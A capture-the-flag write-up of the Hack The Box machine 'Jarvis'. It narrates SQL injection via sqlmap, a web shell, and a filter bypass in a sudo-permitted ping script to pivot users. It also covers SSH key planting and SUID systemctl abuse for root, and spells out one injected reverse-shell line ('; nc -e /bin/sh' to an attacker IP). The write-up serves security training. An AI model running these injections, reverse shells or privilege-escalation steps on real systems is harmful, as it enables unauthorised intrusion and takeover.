Nov 9, 2019
A medium level difficulty machine from HTB Jarvis involving SQL Injection and a web-shell into sudo and filter bypass to user pivot with a final systemctl abuse to root pivot. I will step through the methodology, approaches and musings from start to root flag.
As usual, let us kick it off with a handy nmap scan of the host:
Alright so looks like two separate web instances and an SSH session. Let's quickly look at the non-standard 64999 port.
Well that was rude... Let's hope that the other port looks a bit better. After poking around and getting some inspiration for my next Iron Man based vacation I didn't notice anything too obvious. Checking the various page sources didn't reveal any mystical either so decided to turn on Burpsuite and give the site a quick spider.
We can see from both manual investigation and through Burp that there is a parameter being passed to room.php as we go through the various rooms. Decided to fire off a sqlmap and see if we get any hits.
Excellent! We popped ourselves a shell! www-data is not necessarily ideal, and the sqlmap shell is also not ideal, so let's get our own python shell file and upgrade a bit.
Moving it on to the host we setup a listener on our attacking machine and pull the trigger.
Slightly better. Let's take a poke at what we see.
Doh! So close... At least we know the file is there. We now also know we need try and pivot to the user pepper. After a few minutes of poking around found something interesting with the sudo list.
So we are trying to pivot to user and there just happens to be a defined rule that we can execute as that user? That seems promising. After a bit of poking through the script it seems that running simpler.py essentially pings a host that you pass as a parameter. It also looks like there is some forbidden character filters to prevent chaining commands - but that should not stop us.
My initial thoughts were to leverage character encoding. I wanted to try and chain a ; nc -e /bin/sh 10.10.xxx.xxx 1337 on the ping command. After attempting a few different variations, including unicode and hex, without success I stumbled on to an excellent article that seemed quite in line with what I was trying to achieve.
So instead of trying to chain a command to the built-in ping how about encapsulating instead? Seems promising. Let's upload another python shell script and attempt to call the shell script as an encapsulated command.
Then on the receiving end:
Victory. User credentials acquired.
Now we needed to kick off a new privsec enumeration with the user pepper. No new sudo rules, however after running linprivcheck I noticed something interesting in the SUID/GUID section:
Notice /bin/systemctl ? Looks like we have the ability to run it as pepper and since it has SUID set we may be able to exploit it to pivot into root. Quickly searching around I found a reference I will definitely keep handy moving forward - gtfobins. Unfortunately the shell I had on the host was not playing nice with this POC so had to take a tangent and get my shell upgraded first. Since we didn't know pepper's password we couldn't just ssh in as the user with the password, however we could do something that would still allow us to properly log in - ssh keys!
Then all we needed to do was insert the entry on the host.
And just like that we are able to get into the host through normal ssh:
Now that we have a proper shell we can turn our attention back to systemctl. As gtfobins states if systemctl "runs with the SUID bit set and may be exploited to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor". They provide a POC that while it didn't work earlier, let's give it a try now that we have a proper shell. Similar to my previous post I wanted to keep it simple and go straight for the prize. This technique could be leveraged to call another reverse shell script that you previously uploaded to pop a root shell as well.
Victory! With that Jarvis is in the books.
Post Root Cleanup
I wouldn't be a good fellow hacker if I just left the root flag laying around like that. Once completed I reran the systemcl exploit changing the command to clean up after myself.